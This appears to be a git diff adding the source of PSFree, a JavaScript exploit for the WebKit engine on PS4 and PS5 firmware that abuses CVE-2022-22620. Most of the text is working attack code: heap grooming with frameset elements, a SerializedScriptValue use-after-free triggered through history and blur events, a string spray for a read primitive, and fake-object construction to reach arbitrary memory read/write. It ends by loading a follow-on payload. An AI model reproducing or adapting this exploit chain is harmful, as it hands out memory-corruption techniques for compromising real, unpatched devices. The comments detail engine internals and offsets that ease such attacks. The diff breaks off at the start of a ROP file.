+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+import { Int, lohi_from_one } from '/module/int64.mjs';
+import { Addr } from '/module/mem.mjs';
+import { BufferView } from '/module/rw.mjs';
+
+import * as config from '/config.mjs';
+import * as mt from '/module/memtools.mjs';
+
+// View constructors will always get the buffer property in order to make sure
+// that the JSArrayBufferView is a WastefulTypedArray. m_vector may change if
+// m_mode < WastefulTypedArray. This is to make caching the m_view field
+// possible. Users don't have to worry if the m_view they got from addr() is
+// possibly stale.
+//
+// see possiblySharedBuffer() from
+// WebKit/Source/JavaScriptCore/runtime/JSArrayBufferViewInlines.h
+// at PS4 8.03
+//
+// Subclasses of TypedArray are still implemented as a JSArrayBufferView, so
+// get_view_vector() still works on them.
+
+function ViewMixin(superclass) {
+ const res = class extends superclass {
+ constructor(...args) {
+ super(...args);
+ this.buffer;
+ }
+
+ get addr() {
+ let res = this._addr_cache;
+ if (res !== undefined) {
+ return res;
+ }
+ res = mt.get_view_vector(this);
+ this._addr_cache = res;
+ return res;
+ }
+
+ get size() {
+ return this.byteLength;
+ }
+
+ addr_at(index) {
+ const size = this.BYTES_PER_ELEMENT;
+ return this.addr.add(index * size);
+ }
+
+ sget(index) {
+ return this[index] | 0;
+ }
+ };
+
+ // workaround for known affected versions: ps4 [6.00, 10.00)
+ //
+ // see from() and of() from
+ // WebKit/Source/JavaScriptCore/builtins/TypedArrayConstructor.js at PS4
+ // 8.0x
+ //
+ // @getByIdDirectPrivate(this, "allocateTypedArray") will fail when "this"
+ // isn't one of the built-in TypedArrays. this is a violation of the
+ // ECMAScript spec at that time
+ //
+ // TODO assumes ps4, support ps5 as well
+ // FIXME define the from/of workaround functions once
+ if (0x600 <= config.target && config.target < 0x1000) {
+ res.from = function from(...args) {
+ const base = this.__proto__;
+ return new this(base.from(...args).buffer);
+ };
+
+ res.of = function of(...args) {
+ const base = this.__proto__;
+ return new this(base.of(...args).buffer);
+ };
+ }
+
+ return res;
+}
+
+export class View1 extends ViewMixin(Uint8Array) {}
+export class View2 extends ViewMixin(Uint16Array) {}
+export class View4 extends ViewMixin(Uint32Array) {}
+
+export class Buffer extends BufferView {
+ get addr() {
+ let res = this._addr_cache;
+ if (res !== undefined) {
+ return res;
+ }
+ res = mt.get_view_vector(this);
+ this._addr_cache = res;
+ return res;
+ }
+
+ get size() {
+ return this.byteLength;
+ }
+
+ addr_at(index) {
+ return this.addr.add(index);
+ }
+}
+// see from() and of() comment above
+if (0x600 <= config.target && config.target < 0x1000) {
+ Buffer.from = function from(...args) {
+ const base = this.__proto__;
+ return new this(base.from(...args).buffer);
+ };
+ Buffer.of = function of(...args) {
+ const base = this.__proto__;
+ return new this(base.of(...args).buffer);
+ };
+}
+
+const VariableMixin = superclass => class extends superclass {
+ constructor(value=0) {
+ // unlike the View classes, we don't allow number coercion. we
+ // explicitly allow floats unlike Int
+ if (typeof value !== 'number') {
+ throw TypeError('value not a number');
+ }
+ super([value]);
+ }
+
+ addr_at(...args) {
+ throw TypeError('unimplemented method');
+ }
+
+ [Symbol.toPrimitive](hint) {
+ return this[0];
+ }
+
+ toString(...args) {
+ return this[0].toString(...args);
+ }
+};
+
+export class Byte extends VariableMixin(View1) {}
+export class Short extends VariableMixin(View2) {}
+// Int was already taken by int64.mjs
+export class Word extends VariableMixin(View4) {}
+
+export class LongArray {
+ constructor(length) {
+ this.buffer = new DataView(new ArrayBuffer(length * 8));
+ }
+
+ get addr() {
+ return mt.get_view_vector(this.buffer);
+ }
+
+ addr_at(index) {
+ return this.addr.add(index * 8);
+ }
+
+ get length() {
+ return this.buffer.length / 8;
+ }
+
+ get size() {
+ return this.buffer.byteLength;
+ }
+
+ get byteLength() {
+ return this.size;
+ }
+
+ get(index) {
+ const buffer = this.buffer;
+ const base = index * 8;
+ return new Int(
+ buffer.getUint32(base, true),
+ buffer.getUint32(base + 4, true),
+ );
+ }
+
+ set(index, value) {
+ const buffer = this.buffer;
+ const base = index * 8;
+ const values = lohi_from_one(value);
+
+ buffer.setUint32(base, values[0], true);
+ buffer.setUint32(base + 4, values[1], true);
+ }
+}
+
+// mutable Int (we are explicitly using Int's private fields)
+const Word64Mixin = superclass => class extends superclass {
+ constructor(...args) {
+ if (!args.length) {
+ return super(0);
+ }
+ super(...args);
+ }
+
+ get addr() {
+ // assume this is safe to cache
+ return mt.get_view_vector(this._u32);
+ }
+
+ get length() {
+ return 1;
+ }
+
+ get size() {
+ return 8;
+ }
+
+ get byteLength() {
+ return 8;
+ }
+
+ // no setters for top and bot since low/high can accept negative integers
+
+ get lo() {
+ return super.lo;
+ }
+
+ set lo(value) {
+ this._u32[0] = value;
+ }
+
+ get hi() {
+ return super.hi;
+ }
+
+ set hi(value) {
+ this._u32[1] = value;
+ }
+
+ set(value) {
+ const buffer = this._u32;
+ const values = lohi_from_one(value);
+
+ buffer[0] = values[0];
+ buffer[1] = values[1];
+ }
+};
+
+export class Long extends Word64Mixin(Int) {
+ as_addr() {
+ return new Addr(this);
+ }
+}
+export class Pointer extends Word64Mixin(Addr) {}
diff --git a/src/psfree.mjs b/src/psfree.mjs
new file mode 100644
index 0000000..9fbec14
--- /dev/null
+++ b/src/psfree.mjs
@@ -0,0 +1,862 @@
+/* Copyright (C) 2023-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+// PSFree is a WebKit exploit using CVE-2022-22620 to gain arbitrary read/write
+//
+// vulnerable:
+// * PS4 [6.00, 10.00)
+// * PS5 [1.00, 6.00)
+//
+// * CelesteBlue from ps4-dev on discord.com
+// * Helped in figuring out the size of WebCore::SerializedScriptValue and
+// its needed offsets on different firmwares.
+// * figured out the range of vulnerable firmwares
+// * janisslsm from ps4-dev on discord.com
+// * Helped in figuring out the size of JSC::ArrayBufferContents and its
+// needed offsets on different firmwares.
+// * Kameleon_ from ps4-dev on discord.com - tester
+// * SlidyBat from PS5 R&D discord.com
+// * Helped in figuring out the size of JSC::ArrayBufferContents and its
+// needed offsets on different firmwares (PS5).
+
+import { Int } from '/module/int64.mjs';
+import { Memory } from '/module/mem.mjs';
+import { KB, MB } from '/module/offset.mjs';
+import { BufferView } from '/module/rw.mjs';
+
+import {
+ die,
+ DieError,
+ log,
+ clear_log,
+ sleep,
+ hex,
+ align,
+} from '/module/utils.mjs';
+
+import * as config from '/config.mjs';
+import * as off from '/module/offset.mjs';
+
+// check if we are running on a supported firmware version
+const [is_ps4, version] = (() => {
+ const value = config.target;
+ const is_ps4 = (value & 0x10000) === 0;
+ const version = value & 0xffff;
+ const [lower, upper] = (() => {
+ if (is_ps4) {
+ return [0x600, 0x1000];
+ } else {
+ return [0x100, 0x600];
+ }
+ })();
+
+ if (!(lower <= version && version < upper)) {
+ throw RangeError(`invalid config.target: ${hex(value)}`);
+ }
+
+ return [is_ps4, version];
+})();
+
+const ssv_len = (() => {
+ if (0x600 <= config.target && config.target < 0x650) {
+ return 0x58;
+ }
+
+ // PS4 9.xx and all supported PS5 versions
+ if (config.target >= 0x900) {
+ return 0x50;
+ }
+
+ if (0x650 <= config.target && config.target < 0x900) {
+ return 0x48;
+ }
+})();
+
+// these constants are expected to be divisible by 2
+const num_fsets = 0x180;
+const num_spaces = 0x40;
+const num_adjs = 8;
+
+const num_reuses = 0x300;
+const num_strs = 0x200;
+const num_leaks = 0x100;
+
+// we can use the rows attribute of a frameset to allocate from fastMalloc
+//
+// see parseAttribute() from
+// WebKit/Source/WebCore/html/HTMLFrameSetElement.cpp at PS4 8.0x
+//
+// parseAttribute() will call newLengthArray():
+//
+// UniqueArray newLengthArray(const String& string, int& len)
+// {
+// RefPtr str = string.impl()->simplifyWhiteSpace();
+// ...
+// len = countCharacter(*str, ',') + 1; [1]
+// auto r = makeUniqueArray(len); [2]
+// ...
+// }
+//
+// pseudocode definition:
+//
+// class UniqueArray:
+// size_t _size; [3]
+// Length _data[];
+//
+// [2] allocates from the fastMalloc heap. [1] will add an additional 1 to len.
+// [3] adds an extra 8 bytes to the array
+//
+// a Length is 8 bytes in size. if we want to allocate ssv_len bytes from
+// fastMalloc, then we need:
+//
+// const num_repeats = ssv_len / 8 - 2;
+// const rows = ','.repeat(num_repeats);
+const rows = ','.repeat(ssv_len / 8 - 2);
+
+const original_strlen = ssv_len - off.size_strimpl;
+const original_loc = location.pathname;
+
+function gc() {
+ new Uint8Array(4 * MB);
+}
+
+function sread64(str, offset) {
+ const low = (
+ str.charCodeAt(offset)
+ | str.charCodeAt(offset + 1) << 8
+ | str.charCodeAt(offset + 2) << 16
+ | str.charCodeAt(offset + 3) << 24
+ );
+ const high = (
+ str.charCodeAt(offset + 4)
+ | str.charCodeAt(offset + 5) << 8
+ | str.charCodeAt(offset + 6) << 16
+ | str.charCodeAt(offset + 7) << 24
+ );
+ return new Int(low, high);
+}
+
+function prepare_uaf() {
+ const fsets = [];
+ const indices = [];
+
+ function alloc_fs(fsets, size) {
+ for (let i = 0; i < size / 2; i++) {
+ const fset = document.createElement('frameset');
+ fset.rows = rows;
+ fset.cols = rows;
+ fsets.push(fset);
+ }
+ }
+
+ // the first call to either replaceState/pushState is likely to allocate a
+ // JSC::IsoAlignedMemoryAllocator near the SSV it creates. this prevents
+ // the SmallLine where the SSV resides from being freed. so we do a dummy
+ // call first
+ history.replaceState('state0', '');
+
+ alloc_fs(fsets, num_fsets);
+
+ // the "state1" SSVs is what we will UAF
+
+ history.pushState('state1', '', original_loc + '#bar');
+ indices.push(fsets.length);
+
+ alloc_fs(fsets, num_spaces);
+
+ history.pushState('state1', '', original_loc + '#foo');
+ indices.push(fsets.length);
+
+ alloc_fs(fsets, num_spaces);
+
+ history.pushState('state2', '');
+ return [fsets, indices];
+}
+
+// WebCore::SerializedScriptValue use-after-free
+//
+// be careful when accessing history.state since History::state() will get
+// called. History will cache the SSV at its m_lastStateObjectRequested if you
+// do. that field is a RefPtr, thus preventing a UAF if we cache "state1"
+async function uaf_ssv(fsets, index, index2) {
+ const views = [];
+ const input = document.createElement('input');
+ input.id = 'input';
+ const foo = document.createElement('input');
+ foo.id = 'foo';
+ const bar = document.createElement('a');
+ bar.id = 'bar';
+
+ log(`ssv_len: ${hex(ssv_len)}`);
+
+ let pop = null;
+ let pop2 = null;
+ let pop_promise2 = null;
+ let blurs = [0, 0];
+ let resolves = [];
+
+ function onpopstate(event) {
+ const no_pop = pop === null;
+ const idx = no_pop ? 0 : 1;
+
+ log(`pop ${idx} came`);
+ if (blurs[idx] === 0) {
+ const r = resolves[idx][1];
+ r(new DieError(`blurs before pop ${idx} came: ${blurs[idx]}`));
+ }
+
+ if (no_pop) {
+ pop_promise2 = new Promise((resolve, reject) => {
+ resolves.push([resolve, reject]);
+ addEventListener('popstate', onpopstate, {once: true});
+ history.back();
+ });
+ }
+
+ if (no_pop) {
+ pop = event;
+ } else {
+ pop2 = event;
+ }
+ resolves[idx][0]();
+ }
+
+ const pop_promise = new Promise((resolve, reject) => {
+ resolves.push([resolve, reject]);
+ addEventListener('popstate', onpopstate, {once: true});
+ });
+
+ function onblur(event) {
+ const target = event.target;
+ const is_input = target === input;
+ const idx = is_input ? 0 : 1;
+ log(`${target.id} blur came`);
+
+ if (blurs[idx] > 0) {
+ die(`${name}: multiple blurs. blurs: ${blurs[idx]}`);
+ }
+
+ // we replace the URL with the original so the user can rerun the
+ // exploit via a reload. If we don't, the exploit will append another
+ // "#foo" to the URL and the input element will not be blurred because
+ // the foo element won't be scrolled to during history.back()
+ history.replaceState('state3', '', original_loc);
+
+ // free the SerializedScriptValue's neighbors and thus free the
+ // SmallLine where it resides
+ const fset_idx = is_input ? index : index2;
+ for (let i = fset_idx - num_adjs/2; i < fset_idx + num_adjs/2; i++) {
+ fsets[i].rows = '';
+ fsets[i].cols = '';
+ }
+
+ for (let i = 0; i < num_reuses; i++) {
+ const view = new Uint8Array(new ArrayBuffer(ssv_len));
+ view[0] = 0x41;
+ views.push(view);
+ }
+
+ blurs[idx]++;
+ }
+
+ input.addEventListener('blur', onblur);
+ foo.addEventListener('blur', onblur);
+
+ document.body.append(input);
+ document.body.append(foo);
+ document.body.append(bar);
+
+ // FrameLoader::loadInSameDocument() calls Document::statePopped().
+ // statePopped() will defer firing of popstate until we're in the complete
+ // state
+ //
+ // this means that onblur() will run with "state2" as the current history
+ // item if we call loadInSameDocument too early
+ log(`readyState now: ${document.readyState}`);
+
+ if (document.readyState !== 'complete') {
+ await new Promise(resolve => {
+ document.addEventListener('readystatechange', function foo() {
+ if (document.readyState === 'complete') {
+ document.removeEventListener('readystatechange', foo);
+ resolve();
+ }
+ });
+ });
+ }
+
+ log(`readyState now: ${document.readyState}`);
+
+ await new Promise(resolve => {
+ input.addEventListener('focus', resolve, {once: true});
+ input.focus();
+ });
+
+ history.back();
+ await pop_promise;
+ await pop_promise2;
+
+ log('done await popstate');
+
+ input.remove();
+ foo.remove();
+ bar.remove();
+
+ const res = [];
+ for (let i = 0; i < views.length; i++) {
+ const view = views[i];
+ if (view[0] !== 0x41) {
+ log(`view index: ${hex(i)}`);
+ log('found view:');
+ log(view);
+
+ // set SSV's refcount to 1, all other fields to 0/NULL
+ view[0] = 1;
+ view.fill(0, 1);
+
+ if (res.length) {
+ res[1] = [new BufferView(view.buffer), pop2];
+ break;
+ }
+
+ // return without keeping any references to pop, making it GC-able.
+ // its WebCore::PopStateEvent will then be freed on its death
+ res[0] = new BufferView(view.buffer);
+ i = num_reuses - 1;
+ }
+ }
+
+ if (res.length !== 2) {
+ die('failed SerializedScriptValue UAF');
+ }
+ return res;
+}
+
+class Reader {
+ constructor(rstr, rstr_view) {
+ this.rstr = rstr;
+ this.rstr_view = rstr_view;
+ this.m_data = rstr_view.read64(off.strimpl_m_data);
+ }
+
+ read8_at(offset) {
+ return this.rstr.charCodeAt(offset);
+ }
+
+ read32_at(offset) {
+ const str = this.rstr;
+ return (
+ str.charCodeAt(offset)
+ | str.charCodeAt(offset + 1) << 8
+ | str.charCodeAt(offset + 2) << 16
+ | str.charCodeAt(offset + 3) << 24
+ ) >>> 0;
+ }
+
+ read64_at(offset) {
+ return sread64(this.rstr, offset);
+ }
+
+ read64(addr) {
+ this.rstr_view.write64(off.strimpl_m_data, addr);
+ return sread64(this.rstr, 0);
+ }
+
+ set_addr(addr) {
+ this.rstr_view.write64(off.strimpl_m_data, addr);
+ }
+
+ // remember to use this to fix up the StringImpl before freeing it
+ restore() {
+ this.rstr_view.write64(off.strimpl_m_data, this.m_data);
+ this.rstr_view.write32(off.strimpl_strlen, original_strlen);
+ }
+}
+
+// we now have a double free on the fastMalloc heap
+async function make_rdr(view) {
+ let str_wait = 0;
+ const strs = [];
+ const u32 = new Uint32Array(1);
+ const u8 = new Uint8Array(u32.buffer);
+ const marker_offset = original_strlen - 4;
+ const pad = 'B'.repeat(marker_offset);
+
+ log('start string spray');
+ while (true) {
+ for (let i = 0; i < num_strs; i++) {
+ u32[0] = i;
+ // on versions like 8.0x:
+ // * String.fromCharCode() won't create a 8-bit string. so we use
+ // fromCodePoint() instead
+ // * Array.prototype.join() won't try to convert 16-bit strings to
+ // 8-bit
+ //
+ // given the restrictions above, we will ensure "str" is always a
+ // 8-bit string. you can check a WebKit source code (e.g. on 8.0x)
+ // to see that String.prototype.repeat() will create a 8-bit string
+ // if the repeated string's length is 1
+ //
+ // Array.prototype.join() calls JSC::JSStringJoiner::join(). it
+ // returns a plain JSString (not a JSRopeString). that means we
+ // have allocated a WTF::StringImpl with the proper size and whose
+ // string data is inlined
+ const str = [pad, String.fromCodePoint(...u8)].join('');
+ strs.push(str);
+ }
+
+ if (view.read32(off.strimpl_inline_str) === 0x42424242) {
+ view.write32(off.strimpl_strlen, 0xffffffff);
+ break;
+ }
+
+ strs.length = 0;
+ gc();
+ await sleep();
+ str_wait++;
+ }
+ log(`JSString reused memory at loop: ${str_wait}`);
+
+ const idx = view.read32(off.strimpl_inline_str + marker_offset);
+ log(`str index: ${hex(idx)}`);
+ log('view:');
+ log(view);
+
+ // versions like 8.0x have a JSC::JSString that have their own m_length
+ // field. strings consult that field instead of the m_length of their
+ // StringImpl
+ //
+ // we work around this by passing the string to Error.
+ // ErrorInstance::create() will then create a new JSString initialized from
+ // the StringImpl of the message argument
+ const rstr = Error(strs[idx]).message;
+ log(`str len: ${hex(rstr.length)}`);
+ if (rstr.length === 0xffffffff) {
+ log('confirmed correct leaked');
+ const addr = (
+ view.read64(off.strimpl_m_data)
+ .sub(off.strimpl_inline_str)
+ );
+ log(`view's buffer address: ${addr}`);
+ return new Reader(rstr, view);
+ }
+ die("JSString wasn't modified");
+}
+
+// we will create a JSC::CodeBlock whose m_constantRegisters is set to an array
+// of JSValues whose size is ssv_len. the undefined constant is automatically
+// added due to reasons such as "undefined is returned by default if the
+// function exits without returning anything"
+const cons_len = ssv_len - 8*5;
+const bt_offset = 0;
+const idx_offset = ssv_len - 8*3;
+const strs_offset = ssv_len - 8*2;
+const src_part = (() => {
+ // we user var instead of let/const since such variables always get
+ // initialized to the NULL JSValue even if you immediately return. we will
+ // make functions that do as little as possible in order to speed up the
+ // exploit. m_constantRegisters will still contain the unused constants
+ //
+ // function foo() {
+ // return;
+ // let a = 1;
+ // }
+ //
+ // the resulting bytecode:
+ // bb#1
+ // [ 0] enter
+ // [ 1] get_scope loc4
+ // [ 3] mov loc5, loc4
+ // [ 6] check_traps
+ // // this part still initializes a with the NULL JSValue
+ // [ 7] mov loc6, (const0)
+ // [ 10] ret Undefined(const1)
+ // Successors: [ ]
+ //
+ // bb#2
+ // [ 12] mov loc6, Int32: 1(const2)
+ // [ 15] ret Undefined(const1)
+ // Successors: [ ]
+ //
+ //
+ // Constants:
+ // k0 =
+ // k1 = Undefined
+ // k2 = Int32: 1: in source as integer
+ let res = 'var f = 0x11223344;\n';
+ // make unique constants that won't collide with the possible marker values
+ for (let i = 0; i < cons_len; i += 8) {
+ res += `var a${i} = ${num_leaks + i};\n`;
+ }
+ return res;
+})();
+
+async function leak_code_block(reader, bt_size) {
+ const rdr = reader;
+ const bt = [];
+ // take into account the cell and indexing header of the immutable
+ // butterfly
+ for (let i = 0; i < bt_size - 0x10; i += 8) {
+ bt.push(i);
+ }
+
+ // cache the global variable resolution
+ const slen = ssv_len;
+
+ const bt_part = `var bt = [${bt}];\nreturn bt;\n`;
+ const part = bt_part + src_part;
+ const cache = [];
+ for (let i = 0; i < num_leaks; i++) {
+ cache.push(part + `var idx = ${i};\nidx\`foo\`;`);
+ }
+
+ const chunkSize = (is_ps4 && version < 0x900) ? 128 * KB : 1 * MB;
+ const smallPageSize = 4 * KB;
+ const search_addr = align(rdr.m_data, chunkSize);
+ log(`search addr: ${search_addr}`);
+
+ log(`func_src:\n${cache[0]}\nfunc_src end`);
+ log('start find CodeBlock');
+ let winning_off = null;
+ let winning_idx = null;
+ let winning_f = null;
+ let find_cb_loop = 0;
+ // false positives
+ let fp = 0;
+ rdr.set_addr(search_addr);
+ loop: while (true) {
+ const funcs = [];
+ for (let i = 0; i < num_leaks; i++) {
+ const f = Function(cache[i]);
+ // the first call allocates the CodeBlock
+ f();
+ funcs.push(f);
+ }
+
+ for (let p = 0; p < chunkSize; p += smallPageSize) {
+ for (let i = p; i < p + smallPageSize; i += slen) {
+ if (rdr.read32_at(i + 8) !== 0x11223344) {
+ continue;
+ }
+
+ rdr.set_addr(rdr.read64_at(i + strs_offset));
+ const m_type = rdr.read8_at(5);
+ // make sure we're not reading the constant registers of an
+ // UnlinkedCodeBlock. those have JSTemplateObjectDescriptors.
+ // CodeBlock converts those to JSArrays
+ if (m_type !== 0) {
+ rdr.set_addr(search_addr);
+ winning_off = i;
+ winning_idx = rdr.read32_at(i + idx_offset);
+ winning_f = funcs[winning_idx];
+ break loop;
+ }
+ rdr.set_addr(search_addr);
+ fp++;
+ }
+ }
+
+ find_cb_loop++;
+ gc();
+ await sleep();
+ }
+ log(`loop ${find_cb_loop} winning_off: ${hex(winning_off)}`);
+ log(`winning_idx: ${hex(winning_idx)} false positives: ${fp}`);
+
+ log('CodeBlock.m_constantRegisters.m_buffer:');
+ rdr.set_addr(search_addr.add(winning_off));
+ for (let i = 0; i < slen; i += 8) {
+ log(`${rdr.read64_at(i)} | ${hex(i)}`);
+ }
+
+ const bt_addr = rdr.read64_at(bt_offset);
+ const strs_addr = rdr.read64_at(strs_offset);
+ log(`immutable butterfly addr: ${bt_addr}`);
+ log(`string array passed to tag addr: ${strs_addr}`);
+
+ log('JSImmutableButterfly:');
+ rdr.set_addr(bt_addr);
+ for (let i = 0; i < bt_size; i += 8) {
+ log(`${rdr.read64_at(i)} | ${hex(i)}`);
+ }
+
+ log('string array:');
+ rdr.set_addr(strs_addr);
+ for (let i = 0; i < off.size_jsobj; i += 8) {
+ log(`${rdr.read64_at(i)} | ${hex(i)}`);
+ }
+
+ return [winning_f, bt_addr, strs_addr];
+}
+
+// data to write to the SerializedScriptValue
+//
+// setup to make deserialization create an ArrayBuffer with an arbitrary buffer
+// address
+function make_ssv_data(ssv_buf, view, view_p, addr, size) {
+ // sizeof JSC::ArrayBufferContents
+ const size_abc = (() => {
+ if (is_ps4) {
+ return version >= 0x900 ? 0x18 : 0x20;
+ } else {
+ return version >= 0x300 ? 0x18 : 0x20;
+ }
+ })();
+
+ const data_len = 9;
+ // sizeof WTF::Vector
+ const size_vector = 0x10;
+
+ // SSV offsets
+ const off_m_data = 8;
+ const off_m_abc = 0x18;
+ // view offsets
+ const voff_vec_abc = 0; // Vector
+ const voff_abc = voff_vec_abc + size_vector; // ArrayBufferContents
+ const voff_data = voff_abc + size_abc;
+
+ // WTF::Vector
+ // write m_data
+ // m_buffer
+ ssv_buf.write64(off_m_data, view_p.add(voff_data));
+ // m_capacity
+ ssv_buf.write32(off_m_data + 8, data_len);
+ // m_size
+ ssv_buf.write64(off_m_data + 0xc, data_len);
+
+ // 6 is the serialization format version number for ps4 6.00. The format
+ // is backwards compatible and using a value less than the current version
+ // number used by a specific WebKit version is considered valid.
+ //
+ // See CloneDeserializer::isValid() from
+ // WebKit/Source/WebCore/bindings/js/SerializedScriptValue.cpp at PS4 8.0x.
+ const CurrentVersion = 6;
+ const ArrayBufferTransferTag = 23;
+ view.write32(voff_data, CurrentVersion);
+ view[voff_data + 4] = ArrayBufferTransferTag;
+ view.write32(voff_data + 5, 0);
+
+ // std::unique_ptr>
+ // write m_arrayBufferContentsArray
+ ssv_buf.write64(off_m_abc, view_p.add(voff_vec_abc));
+ // write WTF::Vector
+ view.write64(voff_vec_abc, view_p.add(voff_abc));
+ view.write32(voff_vec_abc + 8, 1);
+ view.write32(voff_vec_abc + 0xc, 1);
+
+ if (size_abc === 0x20) {
+ // m_destructor, offset 0, leave as 0
+ // m_shared, offset 8, leave as 0
+ // m_data
+ view.write64(voff_abc + 0x10, addr);
+ // m_sizeInBytes
+ view.write32(voff_abc + 0x18, size);
+ } else {
+ // m_data
+ view.write64(voff_abc + 0, addr);
+ // m_destructor (48 bits), offset 8, leave as 0
+ // m_shared (48 bits), offset 0xe, leave as 0
+ // m_sizeInBytes
+ view.write32(voff_abc + 0x14, size);
+ }
+}
+
+async function make_arw(reader, view2, pop) {
+ const rdr = reader;
+
+ // we have to align the fake object to atomSize (16) else the process
+ // crashes. we don't know why
+ //
+ // since cells (GC memory chunks) are always aligned to atomSize, there
+ // might be code that's assuming that all GC pointers are aligned
+ //
+ // see atomSize from WebKit/Source/JavaScriptCore/heap/MarkedBlock.h at
+ // PS4 8.0x
+ const fakeobj_off = 0x20;
+ const fakebt_base = fakeobj_off + off.size_jsobj;
+ // sizeof JSC::IndexingHeader
+ const indexingHeader_size = 8;
+ // sizeof JSC::ArrayStorage
+ const arrayStorage_size = 0x18;
+ // there's only the .raw property
+ const propertyStorage = 8;
+ const fakebt_off = fakebt_base + indexingHeader_size + propertyStorage;
+
+ log('STAGE: leak CodeBlock');
+ // has too be greater than 0x10. the size of JSImmutableButterfly
+ const bt_size = 0x10 + fakebt_off + arrayStorage_size;
+ const [func, bt_addr, strs_addr] = await leak_code_block(rdr, bt_size);
+
+ const view = rdr.rstr_view;
+ const view_p = rdr.m_data.sub(off.strimpl_inline_str);
+ const view_save = new Uint8Array(view);
+
+ view.fill(0);
+ make_ssv_data(view2, view, view_p, bt_addr, bt_size);
+
+ const bt = new BufferView(pop.state);
+ view.set(view_save);
+
+ log('ArrayBuffer pointing to JSImmutableButterfly:');
+ for (let i = 0; i < bt.byteLength; i += 8) {
+ log(`${bt.read64(i)} | ${hex(i)}`);
+ }
+
+ // the immutable butterfly's indexing type is ArrayWithInt32 so
+ // JSImmutableButterfly::visitChildren() won't ask the GC to scan its slots
+ // for JSObjects to recursively visit. this means that we can write
+ // anything to the the butterfly's data area without fear of a GC crash
+
+ const val_true = 7; // JSValue of "true"
+ const strs_cell = rdr.read64(strs_addr);
+
+ bt.write64(fakeobj_off, strs_cell);
+ bt.write64(fakeobj_off + off.js_butterfly, bt_addr.add(fakebt_off));
+
+ // since .raw is the first ever created property, it's just besides the
+ // indexing header
+ bt.write64(fakebt_off - 0x10, val_true);
+ // indexing header's publicLength and vectorLength
+ bt.write32(fakebt_off - 8, 1);
+ bt.write32(fakebt_off - 8 + 4, 1);
+
+ // custom ArrayStorage that allows read/write to index 0. we have to use an
+ // ArrayStorage because the structure assigned to the structure ID expects
+ // one so visitButterfly() will crash if we try to fake the object with a
+ // regular butterfly
+
+ // m_sparseMap
+ bt.write64(fakebt_off, 0);
+ // m_indexBias
+ bt.write32(fakebt_off + 8, 0);
+ // m_numValuesInVector
+ bt.write32(fakebt_off + 0xc, 1);
+
+ // m_vector[0]
+ bt.write64(fakebt_off + 0x10, val_true);
+
+ // immutable_butterfly[0] = fakeobj;
+ bt.write64(0x10, bt_addr.add(fakeobj_off));
+
+ const fake = func()[0];
+ log(`fake.raw: ${fake.raw}`);
+ log(`fake[0]: ${fake[0]}`);
+ log(`fake: [${fake}]`);
+
+ const test_val = 3;
+ log(`test setting fake[0] to ${test_val}`);
+ fake[0] = test_val;
+ if (fake[0] !== test_val) {
+ die(`unexpected fake[0]: ${fake[0]}`);
+ }
+
+ function addrof(obj) {
+ fake[0] = obj;
+ return bt.read64(fakebt_off + 0x10);
+ }
+
+ // m_mode = WastefulTypedArray, allocated buffer on the fastMalloc heap,
+ // unlike FastTypedArray, where the buffer is managed by the GC. This
+ // prevents random crashes.
+ //
+ // See JSGenericTypedArrayView::visitChildren() from
+ // WebKit/Source/JavaScriptCore/runtime/JSGenericTypedArrayViewInlines.h at
+ // PS4 8.0x.
+ const worker = new DataView(new ArrayBuffer(1));
+ const main_template = new Uint32Array(new ArrayBuffer(off.size_view));
+
+ const leaker = {addr: null, 0: 0};
+
+ const worker_p = addrof(worker);
+ const main_p = addrof(main_template);
+ const leaker_p = addrof(leaker);
+
+ // we'll fake objects using a JSArrayBufferView whose m_mode is
+ // FastTypedArray. it's safe to use its buffer since it's GC-allocated. the
+ // current fastSizeLimit is 1000. if the length is less than or equal to
+ // that, we get a FastTypedArray
+ const scaled_sview = off.size_view / 4;
+ const faker = new Uint32Array(scaled_sview);
+ const faker_p = addrof(faker);
+ const faker_vector = rdr.read64(faker_p.add(off.view_m_vector));
+
+ const vector_idx = off.view_m_vector / 4;
+ const length_idx = off.view_m_length / 4;
+ const mode_idx = off.view_m_mode / 4;
+ const bt_idx = off.js_butterfly / 4;
+
+ // fake a Uint32Array using GC memory
+ faker[vector_idx] = worker_p.lo;
+ faker[vector_idx + 1] = worker_p.hi;
+ faker[length_idx] = scaled_sview;
+
+ rdr.set_addr(main_p);
+ faker[mode_idx] = rdr.read32_at(off.view_m_mode);
+ // JSCell
+ faker[0] = rdr.read32_at(0);
+ faker[1] = rdr.read32_at(4);
+ faker[bt_idx] = rdr.read32_at(off.js_butterfly);
+ faker[bt_idx + 1] = rdr.read32_at(off.js_butterfly + 4);
+
+ // fakeobj()
+ bt.write64(fakebt_off + 0x10, faker_vector);
+ const main = fake[0];
+
+ log('main (pointing to worker):');
+ for (let i = 0; i < off.size_view; i += 8) {
+ const idx = i / 4;
+ log(`${new Int(main[idx], main[idx + 1])} | ${hex(i)}`);
+ }
+
+ new Memory(
+ main, worker, leaker,
+ leaker_p.add(off.js_inline_prop),
+ rdr.read64(leaker_p.add(off.js_butterfly)),
+ );
+ log('achieved arbitrary r/w');
+
+ rdr.restore();
+ // set the refcount to a high value so we don't free the memory, view's
+ // death will already free it (a StringImpl is currently using the memory)
+ view.write32(0, -1);
+ // ditto (a SerializedScriptValue is currently using the memory)
+ view2.write32(0, -1);
+ // we don't want its death to call fastFree() on GC memory
+ make_arw._buffer = bt.buffer;
+}
+
+async function main() {
+ log('STAGE: UAF SSV');
+ const [fsets, indices] = prepare_uaf();
+ const [view, [view2, pop]] = await uaf_ssv(fsets, indices[1], indices[0]);
+
+ log('STAGE: get string relative read primitive');
+ const rdr = await make_rdr(view);
+
+ for (const fset of fsets) {
+ fset.rows = '';
+ fset.cols = '';
+ }
+
+ log('STAGE: achieve arbitrary read/write primitive');
+ await make_arw(rdr, view2, pop);
+
+ clear_log();
+ // path to your script that will use the exploit
+ import('./code.mjs');
+}
+main();
diff --git a/src/rop/800.mjs b/src/rop/800.mjs
new file mode 100644
index 0000000..8c24c60
--- /dev/null
+++ b/src/rop/800.mjs
@@ -0,0 +1,259 @@
+/* Copyright (C) 2023-2025 anonymous
